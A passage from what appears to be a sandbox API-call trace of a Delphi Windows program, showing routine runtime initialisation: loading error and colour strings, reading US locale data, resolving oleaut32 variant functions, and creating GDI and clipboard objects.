hFile=0x0, dwFlags=0x2) returned 0x0 [0207.818] LoadStringA (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0207.819] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x597248 [0207.819] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1da0000 [0207.819] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x598248 [0207.819] VirtualAlloc (lpAddress=0x1da0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1da0000 [0207.819] LoadStringA (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0207.819] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0207.819] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0207.819] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0207.819] LoadStringA (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0207.819] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffea, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0207.820] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0207.820] GetVersionExA (in: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0207.820] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76990000 [0207.820] GetProcAddress (hModule=0x76990000, lpProcName="GetDiskFreeSpaceExA") returned 0x76a2434f [0207.820] GetThreadLocale () returned 0x409 [0207.820] GetThreadLocale () returned 0x409 [0207.820] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jan") returned 4 [0207.820] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd78, cchData=256 | out: lpLCData="January") returned 8 [0207.820] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Feb") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd78, cchData=256 | out: lpLCData="February") returned 9 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mar") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="March") returned 6 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Apr") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="April") returned 6 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jun") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="June") returned 5 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jul") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="July") returned 5 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Aug") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="August") returned 7 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sep") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd78, cchData=256 | out: lpLCData="September") returned 10 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Oct") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd78, cchData=256 | out: lpLCData="October") returned 8 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Nov") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd78, cchData=256 | out: lpLCData="November") returned 9 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Dec") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd78, cchData=256 | out: lpLCData="December") returned 9 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sun") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sunday") returned 7 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mon") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Monday") returned 7 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tue") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tuesday") returned 8 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wed") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wednesday") returned 10 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thu") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thursday") returned 9 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Fri") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Friday") returned 7 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sat") returned 4 [0207.821] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Saturday") returned 9 [0207.821] GetThreadLocale () returned 0x409 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="$") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fecc, cchData=2 | out: lpLCData=".") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="2") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fecc, cchData=2 | out: lpLCData="/") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0207.822] GetThreadLocale () returned 0x409 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0207.822] GetThreadLocale () returned 0x409 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fecc, cchData=2 | out: lpLCData=":") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="AM") returned 3 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="PM") returned 3 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0207.822] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0207.822] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76ee0000 [0207.822] GetProcAddress (hModule=0x76ee0000, lpProcName="VariantChangeTypeEx") returned 0x76ee4c28 [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarNeg") returned 0x76f5c802 [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarNot") returned 0x76f5ec66 [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarAdd") returned 0x76f05934 [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarSub") returned 0x76f5d332 [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarMul") returned 0x76f5dbd4 [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarDiv") returned 0x76f5e405 [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarIdiv") returned 0x76f5f00a [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarMod") returned 0x76f5f15e [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarAnd") returned 0x76f05a98 [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarOr") returned 0x76f5ecfa [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarXor") returned 0x76f5ee2e [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarCmp") returned 0x76efb0dc [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarI4FromStr") returned 0x76ef6fab [0207.823] GetProcAddress (hModule=0x76ee0000, lpProcName="VarR4FromStr") returned 0x76f001a0 [0207.824] GetProcAddress (hModule=0x76ee0000, lpProcName="VarR8FromStr") returned 0x76ef699e [0207.824] GetProcAddress (hModule=0x76ee0000, lpProcName="VarDateFromStr") returned 0x76f06ba7 [0207.824] GetProcAddress (hModule=0x76ee0000, lpProcName="VarCyFromStr") returned 0x76f26c12 [0207.824] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBoolFromStr") returned 0x76efdbd1 [0207.824] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromCy") returned 0x76f07fdc [0207.824] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromDate") returned 0x76ef7a2a [0207.824] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromBool") returned 0x76f00355 [0207.824] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8 [0207.824] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xac [0207.824] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0207.824] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x76890000 [0207.824] GetDC (hWnd=0x0) returned 0x100107b8 [0207.824] GetDeviceCaps (hdc=0x100107b8, index=90) returned 96 [0207.824] ReleaseDC (hWnd=0x0, hDC=0x100107b8) returned 1 [0207.824] GetDC (hWnd=0x0) returned 0x100107b8 [0207.824] GetDeviceCaps (hdc=0x100107b8, index=104) returned 0 [0207.825] ReleaseDC (hWnd=0x0, hDC=0x100107b8) returned 1 [0207.825] CreatePalette (plpal=0x18fb30) returned 0xa080208 [0207.825] GetStockObject (i=7) returned 0x1b00017 [0207.825] GetStockObject (i=5) returned 0x1900015 [0207.825] GetStockObject (i=13) returned 0x18a002e [0207.825] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0207.825] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0207.825] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0207.826] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0e7 [0207.826] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0f8 [0207.826] GetCurrentThreadId () returned 0x7f8 [0207.826] GlobalAddAtomA (lpString="WndProcPtr00400000000007F8") returned 0xc032 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0207.826] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0207.827] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0207.827] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc0f4 [0207.827] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc0dc [0207.827] GetVersion () returned 0x1db10106 [0207.827] GetCurrentProcessId () returned 0x7f4 [0207.828] GlobalAddAtomA (lpString="Delphi000007F4") returned 0xc033 [0207.828] GetCurrentThreadId () returned 0x7f8 [0207.828] GlobalAddAtomA (lpString="ControlOfs00400000000007F8") returned 0xc034 [0207.828] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000007F8") returned 0xc109 [0207.828] GetProcAddress (hModule=0x76890000, lpProcName="GetMonitorInfoA") returned 0x768b4413 [0207.828] GetProcAddress (hModule=0x76890000, lpProcName="GetSystemMetrics") returned 0x768a7d2f [0207.828] GetSystemMetrics (nIndex=19) returned 1 [0207.929] GetSystemMetrics (nIndex=75) returned 1 [0207.929] SystemParametersInfoA (in: 